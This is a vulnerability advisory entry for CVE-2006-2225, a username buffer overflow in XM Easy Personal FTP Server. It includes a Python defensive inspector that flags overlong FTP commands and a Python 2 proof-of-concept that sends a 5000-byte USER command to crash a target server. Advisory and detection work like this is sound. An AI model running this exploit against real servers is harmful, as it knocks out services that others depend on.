XM Easy Personal FTP Server Username Authentication Buffer Overflow Vulnerability

Vulnerability ID: 1110210    Vulnerability type: Buffer overflow
Published: 2006-05-04    Updated: 2006-05-08
CVE ID: CVE-2006-2225    CNNVD-ID: CNNVD-200605-115
Platform: Windows    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/1748
https://cxsecurity.com/issue/WLB-2006050048
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-115
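|Vulnerability details
XM Easy Personal FTP Server is a simple, easy-to-use personal FTP server. It contains an overflow vulnerability in the way it handles the username supplied when a user connects to the server: a user can pass overlong arguments to a buffer through certain commands, and an attacker who successfully exploits this vulnerability can execute arbitrary commands remotely.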
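A defender-side check for the condition described above, as an added example that is not part of the original advisory or the PoC author's code: a Python 3 inspector that reassembles the client side of an FTP control channel and flags any command line longer than a limit, including one split across TCP segments or never terminated. The class and function names, the 512-byte limit and the sample segments are assumptions constructed for illustration.

```python
# Added example, not from the advisory. MAX_LINE is an assumed policy limit.
MAX_LINE = 512


class FtpLineInspector:
    """Reassembles one client's FTP control stream and flags overlong commands."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = b""
        self.discarding = False  # True while skipping the tail of a flagged line
        self.alerts = []

    def _alert(self, line):
        verb = line.split(b" ", 1)[0][:8].decode("ascii", "replace").upper()
        self.alerts.append({"verb": verb, "seen_bytes": len(line)})

    def feed(self, data):
        """Consume one TCP segment from the client side of the control channel."""
        self.buf += data
        while True:
            line, sep, rest = self.buf.partition(b"\n")
            if not sep:
                # No terminator yet: alert as soon as pending data exceeds the limit.
                if len(self.buf) > self.max_line:
                    if not self.discarding:
                        self._alert(self.buf)
                    self.discarding = True
                    self.buf = b""  # bound the inspector's own memory use
                return
            self.buf = rest
            line = line.rstrip(b"\r")
            if self.discarding:
                self.discarding = False  # end of a line that was already flagged
            elif len(line) > self.max_line:
                self._alert(line)


def inspect(segments, max_line=MAX_LINE):
    inspector = FtpLineInspector(max_line)
    for seg in segments:
        inspector.feed(seg)
    return inspector.alerts


# Constructed sample: normal login, then an overlong USER split over three segments.
SAMPLE = [b"USER anonymous\r\nPA", b"SS guest\r\n",
          b"USER " + b"A" * 300, b"A" * 300, b"A" * 100 + b"\r\nQUIT\r\n"]
```

Calling `inspect(SAMPLE)` returns a single alert for the `USER` verb, raised at the segment where the pending line first exceeds the limit rather than when the terminator finally arrives.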
|Vulnerability exploit (EXP)
##############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# ahmed@rewterz.com                                          #
##############################################################

import socket
import struct
import time
import sys


# Python 2 syntax. Builds one FTP USER command with a 5000-byte argument.
buff='USER '+'A'*5000+'\r\n'

if len(sys.argv)!=3:
    print "[+] Usage: %s <ip> <port> \n" %sys.argv[0]
    sys.exit(0)

try:
    print "[+] Connecting to %s" %sys.argv[1]
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((sys.argv[1],int(sys.argv[2])))
    print "[+] Sending Evil buffer"
    time.sleep(1)
    s.send(buff)
    print "[+] Service Crashed"
    s.recv(1024)

except:
    # Any exception, not only a failed connection, ends up here.
    print "[+] Could Not Connect To ftp server"

# milw0rm.com [2006-05-04]
|References

Source: BID
Name: 17836
Link: http://www.securityfocus.com/bid/17836
Source: BUGTRAQ
Name: 20060504 [REWTERZ-20060503] XM Easy Personal FTP Server Remote Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/432960/100/0/threaded
Source: XF
Name: xm-ftp-username-bo(26256)
Link: http://xforce.iss.net/xforce/xfdb/26256
Source: OSVDB
Name: 25314
Link: http://www.osvdb.org/25314
Source: OSVDB
Name: 25277
Link: http://www.osvdb.org/25277
Source: VUPEN
Name: ADV-2006-1673
Link: http://www.frsirt.com/english/advisories/2006/1673
Source: SREASON
Name: 851
Link: http://securityreason.com/securityalert/851
Source: SECUNIA
Name: 19970
Link: http://secunia.com/advisories/19970